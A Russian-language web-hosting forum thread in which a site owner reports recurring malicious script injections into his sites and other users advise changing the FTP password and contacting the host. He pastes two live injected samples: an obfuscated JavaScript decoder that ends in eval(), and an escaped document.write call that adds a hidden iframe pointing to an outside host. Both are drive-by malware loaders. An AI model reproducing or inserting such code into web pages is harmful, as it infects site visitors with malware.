Предыдущая тема :: Следующая тема |
Автор |
Сообщение |
Rizoner
|
Добавлено: 26-12-08 12:46 Заголовок сообщения: хак сайтов |
|
|
у меня на хостинге ВСИ 2 сайта там постяонно пасутся какието хакеры и делают разные вставки я их удаляю а они придумывают всё новые какието, наверное думают что я лох и их не замечу
типа:
<script language=JavaScript> function nbbnb25(z) {var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,36,25,10,56,1,59,30,37,2,0,0,0,0,0,0,21,49,31,32,11,38,15,50,27,43,53,51,6,45,13,61,4,28,16,55,40,9,24,39,7,8,62,0,0,0,0,26,0,14,18,52,0,33,41,22,42,48,35,60,44,47,34,23,54,3,19,20,57,58,46,29,5,17,12);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(150^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}nbbnb25('e0FZGWB44gv4SDZ48m_lbWFZKXHIGWBOjm0k4DaverZ0nFmmAhu0irZO6FmM4B0ZKmhISD0IJBhM8r7OIbI0nDvtlEHvmgvtKFmk4ZFZiWBvnWHhAp6pSDv04b7ZjjmkZvOOn6Fv1BFZGW0ZZZDmCg_T1ZHmAuuOG0_OWLHmAbIMe0mkn60hW_hIpu0k0Xm0nmuTm_Htn0vZKm3MG0BtEI0OmK3Ztj0kcnhhtZFk1B0ZKj_l09')</script><!-- 80.82.32.11 -->
подскажите как можно изловить азарника? слишком уж мало у меня контроля над хостингом ваще незя ничего видеть кто заходит и когда и как |
|
Сообщения: 57
|
|
|
Rizoner
|
Добавлено: 26-12-08 13:09 Заголовок сообщения: |
|
|
извеняюсь поправка не у меня 2 сайта, а контролирую я 2 сайта ) и на все 2 сайта лазают (пароли доступа FTP менять не пробывал) но меня интерескует вопрос не как закрыть хостинг от хакеров а как поймать тех кто туда лазает )) |
|
Сообщения: 57
|
|
|
Rizoner
|
Добавлено: 26-12-08 13:20 Заголовок сообщения: |
|
|
если кому интересно немного расшифровал то что делает этот код код : тут зашифрован код HTML
<iframe src="http://9speed.info.......... дальше расшифровывать не стал |
|
Сообщения: 57
|
|
|
Oleg
|
Добавлено: 26-12-08 14:40 Заголовок сообщения: |
|
|
Rizoner, пароль на FTP-доступ к сайтам вам пора менять. Насчет подробностей свяжитесь с администратором хостинга, написав письмо на webadm@vsi.ru. |
|
Сообщения: 1329
|
|
|
Rizoner
|
Добавлено: 26-12-08 16:33 Заголовок сообщения: |
|
|
понятно спасиб! |
|
Сообщения: 57
|
|
|
Rizoner
|
Добавлено: 10-01-09 01:47 Заголовок сообщения: |
|
|
еще накопал про это дело - если зайти на сайт с такой вставкой - то после этого брраузер начинает глюкавить - то не может прочитать оболасть памяти то еще чтото - вобщем вылетает - вощем лавить их надо и мачить - я пароль пока еще не менял - но лазают на сайты практически каждый день )) пипец - ваще страх потеряли |
|
Сообщения: 57
|
|
|
cardinal
|
Добавлено: 10-01-09 04:34 Заголовок сообщения: |
|
|
Rizoner Ты чё, прикалываешься чтоли???
Туда не надо заходить, там стоит загрузчик какого то вируса, собственно для этого тот код тебе на странички и пихается - через тебя распространяют этот вирус!
К тому же, по моему по правилам хостинга тебя же за это могут и попытатся оставить крайним, скажут дескать твой вирус и предъявят распространение.
Rizoner писал(а): | лазают на сайты практически каждый день | Дык это делает не человек, а бот, ему просто скормили твой пароль и он видимо раз в сутки проверяет и обновляет код. |
|
Сообщения: 854
|
|
|
Rizoner
|
Добавлено: 10-01-09 11:29 Заголовок сообщения: |
|
|
ага зашибись прикольчики - типа ребята не заходите на мой сайт там стаит втсавка типа
<script language="javascript"> document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%74%6E%78%2E%6E%61%6D%65%2F%69%6E%2E%63%67%69%3F%33%27%20%77%69%64%74%68%3D%27%31%27%20%68%65%69%67%68%74%3D%27%31%27%20%73%74%79%6C%65%3D%27%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%27%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>
тут вирус
Да я смело могу заявить не заходитте на мой сайт там вирус - бл но я не могу иго искаренить (это уже за пределами хостинга VSI и не только у меня) я свои сайты чищу 2 раза в сутки но что толку просыпаюсь утром а там снова вставки
а насчет боятся мне что меня обвинят - так пусть сначало правоохранителльные органы разберутся кто лазает и кто что делает
Caldinal согласн твоему заявлению насчет обвинения в распространениии ловить надо всех у кого на сайте вставка подобного рода ))) - мож всетаки наоборот я не распростроанияю а показываю как вирус распрстраняется
ЭТ пусть хакер боится - делото дествительно подсудное |
|
Сообщения: 57
|
|
|
Rizoner
|
Добавлено: 10-01-09 11:34 Заголовок сообщения: |
|
|
ой извените забыл добавить смена пароля помогает лиш на некотрое на время неделю -две мож тоян сидит - но брандмауер вроде показывает что утечек трафика налево нету хз (((( |
|
Сообщения: 57
|
|
|
Vadim
|
Добавлено: 10-01-09 11:44 Заголовок сообщения: |
|
|
Думаю на этом обсуждение нужно закрыть, иначе волей топикстартера мы до вселенского заговора дойдем.
Просто поответственней нужно относиться к защите своей информации, а не фантазиями заниматься. |
|
Сообщения: 4900
|
|
|
|
|
Вы не можете начинать темы Вы не можете отвечать на сообщения Вы не можете редактировать свои сообщения Вы не можете удалять свои сообщения Вы не можете голосовать в опросах
|
|